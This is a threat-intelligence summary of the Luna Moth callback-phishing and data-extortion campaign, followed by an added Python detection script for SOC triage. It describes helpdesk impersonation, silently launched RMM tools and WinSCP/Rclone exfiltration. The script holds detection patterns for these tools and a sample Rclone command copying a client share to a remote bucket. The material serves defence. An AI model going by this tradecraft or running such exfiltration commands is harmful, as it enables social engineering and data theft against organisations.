Luna Moth’s Data Extortion Playbook with Callback Phishing, RMM, and Exfiltration Tools
EclecticIQ has identified an ongoing campaign by the financially motivated threat actor Luna Moth (also known as Silent Ransom Group, UNC3753, and Storm-0252), which it tracked from April 2024 through April 2025. The group primarily targets U.S.-based legal and financial organizations through callback phishing: phishing emails prompt recipients to call fake helpdesk numbers, and the resulting social engineering ends with the victim installing a remote monitoring and management (RMM) tool. EclecticIQ assesses with "high confidence that Luna Moth is very likely linked to actors behind the 2021 BazarCall campaign, known for deploying Conti and Ryuk ransomware." Luna Moth focuses on data theft and extortion, demanding seven-figure ransoms without encrypting files. This shift is "likely a strategic move by former Conti-linked actors to reduce operational risk and sustain revenue following Conti’s 2022 dismantling." The group has registered at least 37 domains through GoDaddy, often using typosquatted patterns such as [company_name]-helpdesk[.]com, and uses platforms such as Reamaze to embed AI-powered chatbots in its phishing pages, making the helpdesk lure more convincing.
In the campaign observed between April 2024 and April 2025, Luna Moth primarily targeted the legal sector, accounting for 40.28% of observed victims. Other affected sectors include financial services (23.61%), accounting (13.89%), business services (6.94%), real estate (4.17%), technology (2.79%), and additional verticals such as energy, gambling, architecture, media, consulting, and retail. Geographically, the United States remains the primary focus with 64 confirmed victim organizations, followed by Canada (3), France (1), and Germany (1). The group's deliberate focus on "high-trust service sectors," especially legal, financial, and insurance firms, where sensitive data is prevalent and compliance obligations are strict, amplifies the pressure to pay and the overall impact of its extortion campaigns.
Luna Moth's attack chain begins with phishing emails that lure victims into calling fraudulent helpdesk numbers. Once connected, the attackers impersonate IT support personnel and create a sense of urgency to persuade victims to install legitimate RMM tools such as AnyDesk, Atera, Splashtop, Syncro, SuperOps, and Zoho Assist. These tools are often installed in unusual directories and executed with command-line flags such as "/silent", "/quiet", "/no-gui", or "/hidden" to evade detection. After establishing remote access, the attackers exfiltrate data with tools such as WinSCP and Rclone, transferring stolen files to actor-controlled servers or cloud storage services. By avoiding traditional malware, this approach keeps a smaller footprint and reduces the chance of detection.
Luna Moth's tactics present challenges for detection and prevention. Their use of legitimate RMM tools and avoidance of traditional malware allow them to bypass standard security measures. Indicators of compromise include RMM tools launched with unusual execution parameters, data exfiltration via WinSCP or Rclone, and typosquatted domains mimicking legitimate organizations. Organizations are advised to implement strict controls over the installation and use of RMM tools, monitor for unusual data transfer activity, and educate employees about the risks of social engineering. Leveraging threat intelligence to block known Luna Moth infrastructure and regularly reviewing security policies can further mitigate the risk posed by this threat actor.
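The two preceding paragraphs describe the observable tradecraft (RMM tools run from unusual directories with silent flags, WinSCP/Rclone for exfiltration, [company_name]-helpdesk[.]com lookalike domains). The following Python block is an added example, not EclecticIQ's code or tooling, that turns those indicators into simple triage logic over constructed process-creation records. It assumes a JSON-per-line log format, matches RMM products by substring of the executable name (vendor binary names vary by version), treats anything outside the two standard Program Files roots as an "unusual directory", and generalizes the domain pattern slightly by also accepting the variant without a hyphen; all of these are assumptions for illustration.

```python
import json
import re
from dataclasses import dataclass

# Product names from the report, matched as substrings of the executable name.
# Assumption: real binary names differ by vendor/version, so keyword matching is used.
RMM_KEYWORDS = ("anydesk", "atera", "splashtop", "syncro", "superops", "zohoassist")
EXFIL_KEYWORDS = ("winscp", "rclone")
# Silent/hidden flags named in the report.
SILENT_FLAGS = {"/silent", "/quiet", "/no-gui", "/hidden"}
# Assumed "normal" install roots; any other path counts as an unusual directory.
STANDARD_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")


@dataclass
class ProcessEvent:
    host: str
    user: str
    image: str      # full path of the executable
    cmdline: str    # full command line as launched


def parse_event(line: str) -> ProcessEvent:
    """Parse one JSON-per-line process-creation record (constructed format)."""
    rec = json.loads(line)
    return ProcessEvent(rec["host"], rec["user"], rec["image"], rec["cmdline"])


def rmm_findings(ev: ProcessEvent) -> list:
    """Return the reasons an event matches the described tradecraft; [] if none."""
    reasons = []
    image = ev.image.lower()
    exe = image.rsplit("\\", 1)[-1]
    if any(k in exe for k in RMM_KEYWORDS):
        used = {tok.lower() for tok in ev.cmdline.split()} & SILENT_FLAGS
        if used:
            reasons.append("rmm_silent_flags:" + ",".join(sorted(used)))
        if not image.startswith(STANDARD_ROOTS):
            reasons.append("rmm_unusual_directory")
    if any(k in exe for k in EXFIL_KEYWORDS):
        reasons.append("exfil_tool:" + exe)
    return reasons


def triage(log_lines: list) -> list:
    """Run rmm_findings over every record and keep only the ones with findings."""
    alerts = []
    for line in log_lines:
        ev = parse_event(line)
        reasons = rmm_findings(ev)
        if reasons:
            alerts.append({"host": ev.host, "user": ev.user,
                           "image": ev.image, "reasons": reasons})
    return alerts


def is_lookalike_helpdesk_domain(domain: str, org_names: list) -> bool:
    """True if domain follows [company_name]-helpdesk.com for one of org_names.

    Accepts defanged input ("[.]") and, as an assumed variant, the form without
    the hyphen. Legitimate subdomains such as helpdesk.<org>.com do not match.
    """
    d = domain.lower().replace("[.]", ".").strip(".")
    for org in org_names:
        pattern = r"^" + re.escape(org.lower()) + r"-?helpdesk\.com$"
        if re.match(pattern, d):
            return True
    return False


# Constructed sample telemetry: hostnames, users and paths are invented.
SAMPLE_EVENTS = [
    {"host": "WS-LAW-07", "user": "jdoe",
     "image": r"C:\Users\jdoe\AppData\Local\Temp\AnyDesk.exe",
     "cmdline": r"C:\Users\jdoe\AppData\Local\Temp\AnyDesk.exe /silent"},
    {"host": "WS-IT-01", "user": "admin",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "cmdline": r"C:\Program Files\AnyDesk\AnyDesk.exe"},
    {"host": "WS-LAW-07", "user": "jdoe",
     "image": r"C:\Users\jdoe\Downloads\rclone.exe",
     "cmdline": r"C:\Users\jdoe\Downloads\rclone.exe copy C:\Shares\Clients remote:bucket"},
    {"host": "WS-FIN-03", "user": "asmith",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"C:\Windows\System32\notepad.exe report.txt"},
    {"host": "WS-FIN-03", "user": "asmith",
     "image": r"C:\ProgramData\SplashtopStreamer.exe",
     "cmdline": r"C:\ProgramData\SplashtopStreamer.exe /hidden /quiet"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert["host"], alert["user"], alert["image"], alert["reasons"])
    print(is_lookalike_helpdesk_domain("acme-helpdesk[.]com", ["acme"]))
```

In the sample log, the properly installed AnyDesk under Program Files with no silent flags produces no finding, while the Temp-directory AnyDesk, the Rclone copy out of a client share, and the hidden Splashtop launch are each flagged with the specific reason, which is the distinction a SOC analyst needs in order to allow legitimate RMM use while catching the pattern this report describes.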